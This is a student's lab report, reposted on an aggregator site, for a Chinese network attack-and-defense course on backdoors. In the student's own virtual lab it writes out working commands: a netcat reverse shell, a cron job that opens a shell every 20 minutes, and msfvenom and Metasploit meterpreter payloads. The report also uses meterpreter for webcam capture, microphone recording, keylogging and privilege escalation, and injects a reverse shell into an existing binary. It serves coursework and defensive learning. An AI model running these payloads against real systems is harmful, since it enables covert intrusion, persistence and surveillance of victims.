20232404 2025-2026-2 《网络与系统攻防技术》实验二实验报告

news/2025/10/22 21:50:57/文章来源:https://www.cnblogs.com/20232404zxy/p/19159036

一、实验内容

(一)主要内容

  1. 掌握后门核心原理。
  2. 学会如何设置后门,如netcat、socat、MSF meterpreter等工具的使用。
  3. 熟悉Linux与Windows系统的后门启动机制。

(二)回答问题

(1) 例举你能想到的一个后门进入到你系统中的可能方式?

恶意软件捆绑。攻击者可能会将后门程序与常用软件捆绑,当用户下载安装这些软件时,后门程序也会被一同安装到系统中。

(2) 例举你知道的后门如何启动起来(win及linux)的方式?

  • Windows启动方式:通过Windows任务计划程序创建任务,设置后门脚本在用户登录或设定的时间自动执行。或者将后门注册为系统服务,以SYSTEM权限随系统启动运行。
  • Linux启动方式:通过crontab -e配置定时任务,让后门脚本在指定时间自动运行。或者把后门命令加到/etc/rc.local或用户目录的.bashrc等启动脚本中,系统或用户登录时自动运行。
  • 通用:通过双击执行后门程序直接启动,虽然需要手动触发,但可通过社会工程学诱导用户。

(3) Meterpreter有哪些给你印象深刻的功能?

我对摄像头拍摄功能最感兴趣。通过webcam_snap命令,攻击方可以直接拍摄被攻击主机的摄像头画面。而且,摄像头拍照非常迅速。本次实验里,我执行该条命令后来不及闪躲就被抓拍到,最后只能通过贴图保护隐私。整个操作完全是在被攻击主机的后台静默运行,虽然现在还会让摄像头的指示灯亮起来,但这个问题比较容易解决。被攻击方完全察觉不到自己的摄像头正在被调用。这让我直观感受到后门对个人隐私的威胁 ,以及这种监控手段的便捷性和隐蔽性。

(4) 如何发现自己有系统有没有被安装后门?

  1. 在任务管理器中检查是否无数字签名或占用大量资源的异常进程。
  2. 使用360等杀毒软件全盘扫描系统文件。
    image
  3. 在任务计划程序等目录中查看是否有未知的启动项或定时任务。
  4. 查看系统日志、防火墙日志,排查是否有异常登录等情况。

二、实验过程

1. 使用netcat获取主机操作Shell,cron启动某项任务

(1)使用netcat获取主机操作Shell

先确认vmware虚拟机与本机联通。
image
本实验需要在本机上有natcat。我之前下载过nmap,因此捆绑下载了ncat.exe。
image
image
kali虚拟机的ip是192.168.29.134。
image
成功获取主机Shell,启动ls
image
image
从主机那边同样可以获取kali虚拟机的shell。
image
image

(2)通过cron定时将Shell控制权发送给本机

我希望能配置cron定时任务,让kali虚拟机在特定时间自动将Shell控制权发送给我的本机。
首先确认目标机已安装cron。
image
通过命令进入cron编辑界面,我选择了nano编辑器。
image
我加入*/20 * * * * /usr/bin/nc 192.168.29.1 4444 -e /bin/bash。即设定为每20分钟就发送过去,没有日期的限制。192.168.29.1是我的本机IP。
image
通过crontab -l命令,可见任务添加成功。
image
在我本机的电脑上提前启动监听,等待一段时间,成功获取shell,此处多的ls是之前还未连接上时我输入的。
image

2. 使用socat获取主机操作Shell

在本机下载socat,链接https://github.com/tech128/socat-1.7.3.0-windows。
image
通过在kali监听5555端口,成功获取windows的shell。
image

3. 使用MSF meterpreter生成后门,利用socat传送到主机并运行获取主机Shell

用此命令生成名为backdoorzxy_x64_new.exe的Windows后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.134 LPORT=4444 -f exe > backdoorzxy_x64_new.exe

命令中的参数详解:

  • windows/meterpreter/reverse_tcp:Windows系统的反向连接 payload(后门会主动连接Kali)。
  • LHOST=192.168.29.134:Kali的IP。
  • LPORT=4444:Kali的自定义监听端口。
  • -f exe:生成exe格式的可执行文件。
  • > backdoorzxy_x64_new.exe:保存在当前目录,名为backdoorzxy_x64_new.exe
    image

因为我尝试了多次文件接收监听,每次本机收到的程序都是错误且不可执行的。所以最后用winscp把backdoorzxy_x64_new.exe传到本机上。
image

在Kali终端启动msfconsole:
命令如下:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp  # 注意payload要与64位后门匹配
set LHOST 192.168.29.134
set LPORT 4444
exploit

image
成功获取本机的shell,可以执行dir命令。

4. 使用MSF meterpreter生成获取音频、摄像头、击键记录等内容的后门,并尝试提权。

通过如下命令生成后门:msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST=192.168.29.134 \ LPORT=4444 \ -f exe -o monitor_backdoor.exe。并将monitor_backdoor.exe通过winscp传到本机。
image
控制目标主机摄像头拍摄照片。false表示关闭详细输出模式,仅输出照片保存路径。
image
image
image
使用命令record_mic -d 5保存5秒的录音。
image
录音存储在root目录下。
image
使用keyscan_start命令,在我的本机后台启动键盘监听,使用keyscan_dump命令展示键盘记录。
image
使用getsystem提权。本次我使用管理员权限运行后门文件,所以成功提权。
image

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

首先,执行msfvenom -x /root/pwn1 -p linux/x86/shell_reverse_tcp LHOST=192.168.29.134 LPORT=4445 -f elf -o pwn1_backdoor命令,其中-x指定注入的原始文件pwn1-p选择适配Linux32位系统的linux/x86/shell_reverse_tcp payload,LHOSTLPORT分别设置为攻击机Kali的IP和监听端口,-f elf指定输出格式为ELF可执行文件。
接着通过chmod +x pwn1_backdoor赋予新文件执行权限。随后启动msfconsole,配置exploit/multi/handler模块,与之前任务设置相同,启动监听。
image
在本机运行pwn1_backdoor后,攻击机即可获取反弹Shell。
image

三、问题与解决方案

问题1:socat找不到

image
解决方案:用完整路径可以找到。
image

问题2:后门程序被占用

image
解决方案:打开Windows任务管理器,寻找并关掉ncat.exe

问题3:后门程序无法在本机电脑上运行

image
我的后门程序是由监听传输到我的本机。起初我以为这个错误是因为我生成的后门程序是32位,而我的本机是64位系统,导致架构不匹配。但在反复确认后,我发现我的后门程序生成命令没有问题。
image
但是始终不能运行该后门程序,而且出现了很多奇怪的错误。
image
image
更让我惊讶的就是这个16位应用程序,即使是刚开始我编写的后门程序是32位通用的,也不应该出现16位的情况。
image
因为过于离谱,我开始排查各种原因。我已关掉了防火墙、病毒保护等防护软件,并以管理员身份运行该后门程序,重新用监听的方式传输后门程序,但都没有效果。
image
因此我怀疑是在传输过程中出现了问题,在kali机中确认后门程序是64位后,我发现本机电脑上的后门程序不能正常显示格式,所以怀疑是在传输的过程中出现问题。
image
解决方案
当我用winscp把此文件转过去后,问题解决。
image

问题4:Meterpreter会话关闭,原因为“Died”

image
解决方案:参考毕悠尘同学的方法,进行kali机上的更新。
image
以及在本机上安装Visual C++ Redistributable的vcredist.x86.exe,最终解决该问题。
image

问题5:不能显示键盘记录

image
解决方案:因为我的本机对键盘记录有防护,我一管理员权限运行后门程序后,即可获取到键盘记录。

四、学习感悟

本次实验还是很复杂的,出现16位应用程序报错时真的让人哭笑不得,不过确实能让人感受到网络攻防的魅力。哪怕是几乎没有什么基础的我们,在简单的培训后,都可以通过后门调用目标主机的摄像头,当代的监控的便捷性与隐蔽性令人感叹,也警示我们日后应该更加重视系统防护。

五、参考资料

  • 0x11_MAL_逆向与Bof基础.md:https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x11_MAL_逆向与Bof基础.md
  • 0x12_MAL_Shellcode基础.md:https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x12_MAL_Shellcode基础.md
  • 0x13_MAL_使用netcat进行反弹链接的shellcode.md:https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x13_MAL_使用netcat进行反弹链接的shellcode.md

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943775.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

1020302118兰逸霏的第一次作业

作业一 1.用requests和BeautifulSoup库方法定向爬取给定网址(http://www.shanghairanking.cn/rankings/bcur/2020 )的数据,屏幕打印爬取的大学排名信息。排名 学校名称 省市 学校类型 总分1 清华大学 北京 综合 852…

MathType 7下载安装教程及激活教程wps嵌入教程(含下载+安装+汉化激活+安装包)

目录一、写在前面:为啥这篇MathType 7教程一定要看?二、先搞懂:MathType 7为啥是教育/科研必备?三、第一步:MathType 7安装包下载(2025实测无病毒,直链速取)四、核心步骤:MathType 7安装+汉化激活(每步带避坑…

论学习有感——驳学习(读书)无用论

从读书以来学习已经二十年有余,一直依靠着天分和性情在体制化的学习道路上浑浑噩噩的深造。有些许个问题,长期以来也没个自己的答案,顺着接受校方和老师的短期目标,也就一直这么过来了。近年来,随着社会上一些争执…

嵌入式软件分层架构设计 - lucky

一、什么是嵌入式分层架构 “嵌入式分层架构”并不是一个全新的架构类型,而是指在嵌入式系统开发中应用和实现分层架构的设计模式,它继承了通用分层架构的所有核心思想和优点,但根据嵌入式系统的独特约束和需求进行…

DP 基础题乱做

恶补基础 DP. CF1061C 多样性 转移是经典的子序列 DP,考虑前 \(i\) 个数,子序列长度为 \(j\) 的方案数. 转移: \[f_{i,j}=\begin{cases} f_{i-1,j-1}+f_{i-1,j}&j\mid a_i\\ f_{i-1,j}&otherwise. \end{cas…

20232315 2025-2026-1 《网络与系统攻防技术》实验二实验报告

20232315 2025-2026-1 《网络与系统攻防技术》实验二实验报告20232315 2025-2026-1 《网络与系统攻防技术》实验二实验报告 目录一、实验基本信息二、实验内容三、实验要求四、实验过程4.1使用netcat获取主机操作Shell…

2025-10-21 XQQ Round 赛后总结

赛时心路历程开 T1,然后 think 一会就秒掉了。大洋里一遍过。 开 T2,然后 think 一会就秒掉了。大洋里也是一遍过。 15:48 think T3,结果假了。但是注意到在 \(m=0\) 的时候是对的,10 分也是分。 16:25 想不到 T3。…

《中华人民共和国网络安全法》第二十一条这一核心考点

《网络安全法》第二十一条 考点精析 法条原文:国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求,履行下列安全保护义务,保障网络免受干扰、破坏或者未经授权的访问,防止网络数据泄露或…

二三级区别

等保第二级 vs 第三级核心差异及考点精析 核心关系:第二级是 “指导防护” ,第三级是 “强制管控、增强审计” 。从二级到三级是质的飞跃,而非简单量的增加,这正是考试的重点。核心差异对比与考点解析控制领域 核心…

小红书 404 重定向

function clientRedirect(e) { window.location.href = e, setTimeout(function() { window.location.href = e }, 100), setTimeout(function() { …

第九章-Where-1S-tHe-Hacker

第九章-Where-1S-tHe-Hacker 1、通过本地 PC RDP到服务器并且找到黑客ID 为多少,将黑客ID 作为 FLAG 提交; 这里一定一定要先把windows安全中心关了。不然会影响后门题目正常做从这里看到了管理员账户和密码,我们先看…

CF 2023D Many Games

huiyoude上界卡不来,怎么这么菜??? 下文的概率都是指的 \(\frac{p}{100}\)。 首先有一个想法就是直接背包,但是 \(\prod p\) 涉及不小的数的乘积并不好放入状态,所以考虑设 \(f_s\) 表示 \(\sum w = s\) 的最大概…

2025.10.22考试记录

T1 题意 在 \(n\) 瓶水中有1瓶毒药,\(m\)次实验,每次选择 \(k\) 瓶水测试其中是否有毒药,给出实验结果,试判断能否辨别出毒药,若能则给出最早得出结论的实验批次,否则求出可能成为毒药的编号。 分析 提前一天就被…

2025多校冲刺CSP模拟赛7 题目分析

T1 题目概述 求: \[\sum_{i=1}^n\sum_{j=i}^n[\gcd(i,j)=i\text{ xor } j] \]其中 \(n\leq 10^7\)。 分析 赛时没有做出来(doge)。 其实细想一下还是可以做的。 不难想到枚举 \(d=\gcd(i,j)\),那么 \(i\text{ xor …

学习资源

关于科研方向以及自己学习的一些经验借鉴资源 LLM 度盘有资料 【1080P】安德烈卡帕西:深入探索像ChatGPT这样的大语言模型|Andrej Karpathy 【2025最新】LLM大模型零基础全套入门保姆级课程,台大李宏毅《生成式人工…

CMC-C# Visual Studio2022 中不能进入断点設置方法

CMC-C# Visual Studio2022 中不能进入断点設置方法

[题解]P4616 [COCI 2017/2018 #5] Pictionary

P4616 [COCI 2017/2018 #5] Pictionary 我们发现,第 \(i\) 天会让所有为 \((m-i+1)\) 倍数的节点相互连通。可以将 \((m-i+1)\) 向它所有的倍数连边,效果是相同的。 我们规定边权为 \(i\)。 那么对于建好的图,我们不…

2025.10.22总结 - A

今天上了离散和马原,感觉还可以,加油

蛋白表达系统的技术布局与应用

引言 蛋白表达技术是分子生物学与生物制药研究的核心支撑之一。不同的蛋白表达系统在转录调控、翻译后修饰以及生产效率上各具特点。对于科研与产业化生产而言,系统选择不仅影响产量,更决定蛋白的结构与功能完整性。…

10月22日

今日学习了离散数学的逻辑结构与马克思主义的原理概论。离散数学严谨的符号推理,与马克思主义宏观的历史规律,分别从微观与宏观维度锻炼了我的抽象与辩证思维。二者虽领域迥异,却共同揭示了世界运行的内在逻辑与秩序…